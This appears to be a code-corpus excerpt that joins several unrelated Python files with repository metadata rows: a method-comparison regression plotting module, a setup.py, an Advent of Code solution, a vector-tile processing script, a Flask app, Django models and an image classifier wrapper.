if self.graph_title is not None:
ax.set_title(self.graph_title)
def passingbablok(method1, method2,
                  x_label='Method 1', y_label='Method 2', title=None,
                  CI=0.95, line_reference=True, line_CI=False, legend=True,
                  color_points='#000000', color_paba='#008bff',
                  point_kws=None,
                  square=False, ax=None):
    """Draw a Passing-Bablok regression comparing two measurement methods.

    Axis-level function: the plot is rendered onto ``ax`` when given,
    otherwise onto the currently active matplotlib Axes.

    Parameters
    ----------
    method1, method2 : array, or list
        Paired values obtained from both methods, preferably as np.array.
    x_label, y_label : str, optional
        Labels for the X- and Y-axis.
    title : str, optional
        Plot title; omitted when None.
    CI : float, optional
        Confidence level for the Passing-Bablok bounds. Defaults to 0.95.
    line_reference : bool, optional
        Draw a grey y=x reference line. Defaults to True.
    line_CI : bool, optional
        Draw dashed lines at the confidence-interval boundaries.
        Defaults to False.
    legend : bool, optional
        Show a legend with the fitted Passing-Bablok equation.
        Defaults to True.
    color_points : str, optional
        Matplotlib-compatible color for the scatter points.
    color_paba : str, optional
        Matplotlib-compatible color for the regression line and band.
    point_kws : dict of key, value mappings, optional
        Extra keyword arguments forwarded to `plt.scatter`.
    square : bool, optional
        Force an equal aspect ratio on the Axes.
    ax : matplotlib Axes, optional
        Target Axes; the active Axes is used when None.

    Returns
    -------
    ax : matplotlib Axes
        Axes object with the Passing-Bablok plot.

    See Also
    -------
    Passing H and Bablok W. J Clin Chem Clin Biochem, vol. 21, no. 11, 1983, pp. 709 - 720
    """
    # Validate inputs and derive estimates first, so no Axes state is
    # touched when the arguments are rejected.
    worker = _PassingBablok(method1, method2,
                            x_label, y_label, title,
                            CI, line_reference, line_CI, legend,
                            color_points, color_paba,
                            point_kws)
    target = ax if ax is not None else plt.gca()
    if square:
        target.set_aspect('equal')
    worker.plot(target)
    return target
class _Linear(object):
    """Internal class for drawing a simple, linear regression plot.

    Fits an ordinary least-squares line predicting method2 from method1,
    stores the slope/intercept point estimates with confidence bounds, and
    renders scatter, fit line and confidence band via :meth:`plot`.
    """

    def __init__(self, method1, method2,
                 x_label, y_label, title,
                 CI, line_reference, line_CI, legend,
                 color_points, color_regr,
                 point_kws):
        # Paired measurements from the two methods under comparison.
        self.method1: np.array = np.asarray(method1)
        self.method2: np.array = np.asarray(method2)
        self.x_title = x_label
        self.y_title = y_label
        self.graph_title = title
        self.CI = CI
        self.color_points = color_points
        self.color_regr = color_regr
        self.line_reference = line_reference
        self.line_CI = line_CI
        self.legend = legend
        # Copy so later mutation of the caller's dict cannot affect us.
        self.point_kws = {} if point_kws is None else point_kws.copy()
        self._check_params()
        self._derive_params()

    def _check_params(self):
        """Validate constructor arguments; raise ValueError on bad input."""
        if len(self.method1) != len(self.method2):
            raise ValueError('Length of method 1 and method 2 are not equal.')
        if self.CI is not None and (self.CI > 1 or self.CI < 0):
            raise ValueError('Confidence interval must be between 0 and 1.')
        if any([not isinstance(x, str) for x in [self.x_title, self.y_title]]):
            raise ValueError('Axes labels arguments should be provided as a str.')

    def _derive_params(self):
        """Fit OLS of method2 on method1 and store estimates with CI bounds."""
        self.n = len(self.method1)
        # Regress method2 on method1 so the fit matches the plot axes
        # (method1 on X) and the legend equation "... * Method 1".
        # (Fixed: the regressand/regressor were previously swapped.)
        _model = sm.OLS(self.method2, sm.add_constant(self.method1)).fit()
        _params = _model.params
        # statsmodels' conf_int takes the significance level, so a 95% CI
        # needs alpha = 0.05. (Fixed: alpha=self.CI gave a 5% interval.)
        _confint = _model.conf_int(alpha=1 - self.CI)
        # Stored as [point estimate, lower bound, upper bound] so plot()
        # draws the point estimate as the line and fills between the bounds
        # — same convention as _PassingBablok. (Fixed: the point estimate
        # was previously stored at index 1, so plot() drew the lower bound.)
        self.intercept = [_params[0], _confint[0][0], _confint[0][1]]
        self.slope = [_params[1], _confint[1][0], _confint[1][1]]

    def plot(self, ax):
        """Draw the scatter, optional y=x reference, fit line and CI band."""
        # plot individual points
        ax.scatter(self.method1, self.method2, s=20, alpha=0.6, color=self.color_points,
                   **self.point_kws)
        # plot reference line (y = x in axes coordinates)
        if self.line_reference:
            ax.plot([0, 1], [0, 1], label='Reference',
                    color='grey', linestyle='--', transform=ax.transAxes)
        # plot linear regression: point estimate plus both CI bounds
        _xvals = np.array(ax.get_xlim())
        _yvals = [self.intercept[s] + self.slope[s] * _xvals for s in range(0, 3)]
        ax.plot(_xvals, _yvals[0], label=f'{self.intercept[0]:.2f} + {self.slope[0]:.2f} * Method 1',
                color=self.color_regr, linestyle='-')
        ax.fill_between(_xvals, _yvals[1], _yvals[2], color=self.color_regr, alpha=0.2)
        if self.line_CI:
            ax.plot(_xvals, _yvals[1], linestyle='--')
            ax.plot(_xvals, _yvals[2], linestyle='--')
        if self.legend:
            ax.legend(loc='upper left', frameon=False)
        ax.set_ylabel(self.y_title)
        ax.set_xlabel(self.x_title)
        if self.graph_title is not None:
            ax.set_title(self.graph_title)
def linear(method1, method2,
           x_label='Method 1', y_label='Method 2', title=None,
           CI=0.95, line_reference=True, line_CI=False, legend=True,
           color_points='#000000', color_regr='#008bff',
           point_kws=None,
           square=False, ax=None):
    """Provide a method comparison using simple, linear regression.

    This is an Axis-level function which will draw the linear regression plot
    onto the current active Axis object unless ``ax`` is provided.

    Parameters
    ----------
    method1, method2 : array, or list
        Values obtained from both methods, preferably provided in a np.array.
    x_label : str, optional
        The label which is added to the X-axis. If None is provided, a standard
        label will be added.
    y_label : str, optional
        The label which is added to the Y-axis. If None is provided, a standard
        label will be added.
    title : str, optional
        Title of the linear regression plot. If None is provided, no title will be plotted.
    CI : float, optional
        The confidence interval employed in the linear regression line. Defaults to 0.95.
    line_reference : bool, optional
        If True, a grey reference line at y=x will be plotted in the plot.
        Defaults to true.
    line_CI : bool, optional
        If True, dashed lines will be plotted at the boundaries of the confidence intervals.
        Defaults to false.
    legend : bool, optional
        If True, will provide a legend containing the computed Linear regression equation.
        Defaults to true.
    color_points : str, optional
        Color of the individual points that will be plotted.
        Color should be provided in format compatible with matplotlib.
    color_regr : str, optional
        Color of the regression line that will be plotted.
        Color should be provided in format compatible with matplotlib.
    square : bool, optional
        If True, set the Axes aspect to "equal" so each cell will be
        square-shaped.
    point_kws : dict of key, value mappings, optional
        Additional keyword arguments for `plt.scatter`.
    ax : matplotlib Axes, optional
        Axes in which to draw the plot, otherwise use the currently-active
        Axes.

    Returns
    -------
    ax : matplotlib Axes
        Axes object with the linear regression plot.
    """
    # Validate inputs and fit the regression; raises before touching Axes
    # state when the arguments are rejected.
    plotter: _Linear = _Linear(method1, method2,
                               x_label, y_label, title,
                               CI, line_reference, line_CI, legend,
                               color_points, color_regr,
                               point_kws)
    # Draw the plot and return the Axes
    if ax is None:
        ax = plt.gca()
    if square:
        ax.set_aspect('equal')
    plotter.plot(ax)
    return ax
| 39.433396 | 118 | 0.591683 |
c9418c993a05d0182f414df4de245fd5f5288aa8 | 1,470 | py | Python | setup.py | jmacgrillen/perspective | 6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6 | [
"MIT"
] | null | null | null | setup.py | jmacgrillen/perspective | 6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6 | [
"MIT"
] | null | null | null | setup.py | jmacgrillen/perspective | 6e6e833d8921c54c907dd6314d4bc02ba3a3c0b6 | [
"MIT"
] | null | null | null | #! /usr/bin/env python -*- coding: utf-8 -*-
"""
Name:
setup.py
Desscription:
Install the maclib package.
Version:
1 - Inital release
Author:
J.MacGrillen <macgrillen@gmail.com>
Copyright:
Copyright (c) John MacGrillen. All rights reserved.
"""
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
install_requirements = [
"maclib",
"opencv-python",
"numpy",
"Pillow",
"charset-normalizer"
]
def setup_perspective_package() -> None:
"""
Install and configure Perspective for use
"""
setup(
name='Perspective',
version="0.0.1",
description='Analyse images using the range of tools provided',
long_description=long_description,
author='J.MacGrillen',
scripts=[],
packages=find_packages(exclude=['tests*']),
include_package_data=True,
install_requires=install_requirements,
license="MIT License",
python_requires=">= 3.7.*",
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
],
)
if __name__ == "__main__":
setup_perspective_package()
| 25.344828 | 71 | 0.593197 |
c941a3a73b37c420856313d2ddda37d278df3e52 | 1,021 | py | Python | 2021/day2.py | MadsPoder/advent-of-code | 4f190e18d24332e21308a7d251c331777b52a5f1 | [
"MIT"
] | 2 | 2019-12-02T22:27:59.000Z | 2019-12-04T07:48:27.000Z | 2021/day2.py | MadsPoder/advent-of-code | 4f190e18d24332e21308a7d251c331777b52a5f1 | [
"MIT"
] | null | null | null | 2021/day2.py | MadsPoder/advent-of-code | 4f190e18d24332e21308a7d251c331777b52a5f1 | [
"MIT"
] | null | null | null | # Playing with pattern matching in python 3.10
# Add lambda to parse commands into command and corresponding units
parse_command = lambda x, y: (x, int(y))
# Read puzzle input
with open ('day2.txt') as fp:
commands = [parse_command(*x.strip().split(' ')) for x in fp.readlines()]
horizontal_position = 0
depth = 0
for command in commands:
match command:
case ['forward', units]:
horizontal_position = horizontal_position + units
case ['down', units]:
depth = depth + units
case ['up', units]:
depth = depth - units
# Part 1
print(depth * horizontal_position)
# Part 2
aim = 0
horizontal_position = 0
depth = 0
for command in commands:
match command:
case ['forward', units]:
horizontal_position = horizontal_position + units
depth = depth + (aim * units)
case ['down', units]:
aim = aim + units
case ['up', units]:
aim = aim - units
print(depth * horizontal_position) | 25.525 | 77 | 0.613124 |
c943169325309fd0984d9e08fbc50df17f771916 | 2,159 | py | Python | etl/vector/process_all.py | nismod/oi-risk-vis | a5c7460a8060a797dc844be95d5c23689f42cd17 | [
"MIT"
] | 2 | 2020-09-29T15:52:48.000Z | 2021-03-31T02:58:53.000Z | etl/vector/process_all.py | nismod/oi-risk-vis | a5c7460a8060a797dc844be95d5c23689f42cd17 | [
"MIT"
] | 41 | 2021-05-12T17:12:14.000Z | 2022-03-17T10:49:20.000Z | etl/vector/process_all.py | nismod/infra-risk-vis | 1e5c28cced578d8bd9c78699e9038ecd66f47cf7 | [
"MIT"
] | null | null | null | #!/bin/env python3
from argparse import ArgumentParser
import csv
import os
from pathlib import Path
import subprocess
import sys
this_directory = Path(__file__).parent.resolve()
vector_script_path = this_directory / 'prepare_vector.sh'
def run_single_processing(in_file_path: Path, out_file_path: Path, layer_name: str, output_layer_name: str, spatial_type: str, where_filter: str, **kwargs):
print(f'Processing vector "{in_file_path}" -> "{out_file_path}"')
command = f'{vector_script_path} "{in_file_path}" "{out_file_path}" "{output_layer_name}" "{spatial_type}" "{layer_name}" "{where_filter}"'
print(f"Running command: {command}", flush=True)
subprocess.run(command, shell=True, stdout=sys.stdout, stderr=sys.stderr)
def process_vector_datasets(raw: Path, out: Path):
infrastructure_dir = raw / 'networks'
csv_path = infrastructure_dir / 'network_layers.csv'
assert csv_path.is_file(), f"{csv_path} is not a file"
with csv_path.open() as f:
reader = csv.DictReader(f)
assert 'path' in reader.fieldnames
assert 'layer_name' in reader.fieldnames
assert 'spatial_type' in reader.fieldnames
assert 'where_filter' in reader.fieldnames
assert 'output_layer_name' in reader.fieldnames
for row in reader:
in_file_path = raw / row['path']
output_layer_name = row['output_layer_name']
out_file_path = out / f"{output_layer_name}.mbtiles"
if os.path.exists(out_file_path) and (os.path.getmtime(in_file_path) < os.path.getmtime(out_file_path)):
print("Skipping", out_file_path)
continue
run_single_processing(in_file_path, out_file_path, **row)
if __name__ == '__main__':
parser = ArgumentParser(description='Converts all vector datasets to GeoJSON and then to MBTILES')
parser.add_argument('--raw', type=Path, help='Root of the raw data directory. Assumes a file network_layers.csv exists in the dir.', required=True)
parser.add_argument('--out', type=Path, help='Directory in which to store results of the processing', required=True)
args = parser.parse_args()
process_vector_datasets(args.raw.expanduser().resolve(), args.out.expanduser().resolve())
| 41.519231 | 156 | 0.742937 |
c944a392c3c65b876eac48378aa9aaaa59c4cea9 | 1,688 | py | Python | django/week9/main/models.py | yrtby/Alotech-Fullstack-Bootcamp-Patika | e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d | [
"MIT"
] | 1 | 2021-11-05T09:45:25.000Z | 2021-11-05T09:45:25.000Z | django/week9/main/models.py | yrtby/Alotech-Fullstack-Bootcamp-Patika | e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d | [
"MIT"
] | null | null | null | django/week9/main/models.py | yrtby/Alotech-Fullstack-Bootcamp-Patika | e2fd775e2540b8d9698dcb7dc38f84a6d7912e8d | [
"MIT"
] | 3 | 2021-11-07T07:16:30.000Z | 2021-12-07T20:22:59.000Z | from django.db import models
from django.contrib.auth.models import User
from django.core.validators import MinLengthValidator
# Create your models here.
class Post(models.Model):
image = models.ImageField(upload_to='uploads/')
content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
author = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.content}' shared by '{self.author.username}'"
@property
def likes_count(self):
if hasattr(self, '_likes_count'):
return self.like_set.count()
self._likes_count = self.like_set.count()
return self.like_set.count()
@property
def comments_count(self):
if hasattr(self, '_comments_count'):
return self.comment_set.count()
self._comments_count = self.comment_set.count()
return self.comment_set.count()
class Like(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.post.content}' liked by '{self.user.username}'"
class Comment(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE)
user = models.ForeignKey(User, on_delete=models.CASCADE)
content = models.TextField(max_length=200, validators=[MinLengthValidator(10)])
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return f"Post '{self.post.content}' commented by '{self.user.username}'"
| 35.914894 | 83 | 0.708531 |
c9463207e60b37b4cf9f338b3635a5669f81cf71 | 286 | py | Python | codewars/6kyu/dinamuh/CountingDuplicates/main.py | dinamuh/Training_one | d18e8fb12608ce1753162c20252ca928c4df97ab | [
"MIT"
] | null | null | null | codewars/6kyu/dinamuh/CountingDuplicates/main.py | dinamuh/Training_one | d18e8fb12608ce1753162c20252ca928c4df97ab | [
"MIT"
] | 2 | 2019-01-22T10:53:42.000Z | 2019-01-31T08:02:48.000Z | codewars/6kyu/dinamuh/CountingDuplicates/main.py | dinamuh/Training_one | d18e8fb12608ce1753162c20252ca928c4df97ab | [
"MIT"
] | 13 | 2019-01-22T10:37:42.000Z | 2019-01-25T13:30:43.000Z | def duplicate_count(text):
x = set()
y = set()
for char in text:
char = char.lower()
if char in x:
y.add(char)
x.add(char)
return len(y)
def duplicate_count2(s):
return len([c for c in set(s.lower()) if s.lower().count(c) > 1])
| 20.428571 | 69 | 0.527972 |
c947e59db3be68e0dcce4600b6cfeb33b848886c | 375 | py | Python | tests/test_dir_dataset.py | gimlidc/igre | bf3425e838cca3d1fa8254a2550ecb44774ee0ef | [
"MIT"
] | 1 | 2021-09-24T09:12:06.000Z | 2021-09-24T09:12:06.000Z | tests/test_dir_dataset.py | gimlidc/igre | bf3425e838cca3d1fa8254a2550ecb44774ee0ef | [
"MIT"
] | null | null | null | tests/test_dir_dataset.py | gimlidc/igre | bf3425e838cca3d1fa8254a2550ecb44774ee0ef | [
"MIT"
] | null | null | null | import stable.modalities.dir_dataset as dataset
import os.path
def test_load_all_images():
srcdir = os.path.join("tests", "assets")
data, metadata = dataset.load_all_images(srcdir)
assert metadata["resolutions"] == [(125, 140)]
assert data[0].shape[2] == 2
assert metadata["filenames"][0] == ["mari_magdalena-detail.png", "mari_magdalenaIR-detail.png"]
| 34.090909 | 99 | 0.706667 |
c949f74729063705c3b6e636bb65a45813ce66bb | 1,118 | py | Python | sample/main.py | qjw/flasgger | d43644da1fea6af596ff0e2f11517b578377850f | [
"MIT"
] | 5 | 2018-03-07T03:54:36.000Z | 2022-01-01T04:43:48.000Z | sample/main.py | qjw/flasgger | d43644da1fea6af596ff0e2f11517b578377850f | [
"MIT"
] | null | null | null | sample/main.py | qjw/flasgger | d43644da1fea6af596ff0e2f11517b578377850f | [
"MIT"
] | 2 | 2021-11-11T08:48:39.000Z | 2022-01-01T04:43:49.000Z | import logging
import jsonschema
from flask import Flask, jsonify
from flask import make_response
from flasgger import Swagger
from sample.config import Config
def init_logging(app):
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter(
'%(asctime)s %(levelname)s [%(pathname)s:%(lineno)s] - %(message)s'))
app.logger.setLevel(logging.INFO)
app.logger.addHandler(handler)
if app.debug:
sa_logger = logging.getLogger('sqlalchemy.engine')
sa_logger.setLevel(logging.INFO)
sa_logger.addHandler(handler)
app = Flask(__name__)
app.config.update(Config or {})
init_logging(app)
Swagger(app)
@app.errorhandler(jsonschema.ValidationError)
def handle_bad_request(e):
return make_response(jsonify(code=400,
message=e.schema.get('error', '参数校验错误'),
details=e.message,
schema=str(e.schema)), 200)
from sample.api import api
app.register_blueprint(api, url_prefix='/api/v123456')
if __name__=='__main__':
app.run() | 25.409091 | 77 | 0.675313 |
c94abc02ec26c5e120241965ee1760edb37aa362 | 909 | py | Python | cuticle_analysis/models/e2e.py | ngngardner/cuticle_analysis | 7ef119d9ee407df0faea63705dcea76d9f42614b | [
"MIT"
] | null | null | null | cuticle_analysis/models/e2e.py | ngngardner/cuticle_analysis | 7ef119d9ee407df0faea63705dcea76d9f42614b | [
"MIT"
] | 4 | 2021-07-02T17:49:44.000Z | 2021-09-27T01:06:41.000Z | cuticle_analysis/models/e2e.py | ngngardner/cuticle_analysis | 7ef119d9ee407df0faea63705dcea76d9f42614b | [
"MIT"
] | null | null | null |
import numpy as np
from .cnn import CNN
from .kviews import KViews
from .. import const
class EndToEnd():
def __init__(
self,
bg_model: CNN,
rs_model: KViews
) -> None:
self.name = 'EndToEnd'
self.bg_model = bg_model
self.rs_model = rs_model
def metadata(self):
return self.bg_model.metadata() + self.rs_model.metadata()
def predict(self, image: np.ndarray) -> np.ndarray:
# first find background
preds = self.bg_model.predict(image)
# cuticle detected, so use rs_model
if preds.any() == const.BG_LABEL_MAP['cuticle']:
idx = np.where(preds == 1)
rs_preds = self.rs_model.predict(image[idx])
# remap (0, 1) to (1, 2)
mp = {0: 1, 1: 2}
rs_preds = np.array([mp[i] for i in rs_preds])
preds[idx] = rs_preds
return preds
| 24.567568 | 66 | 0.567657 |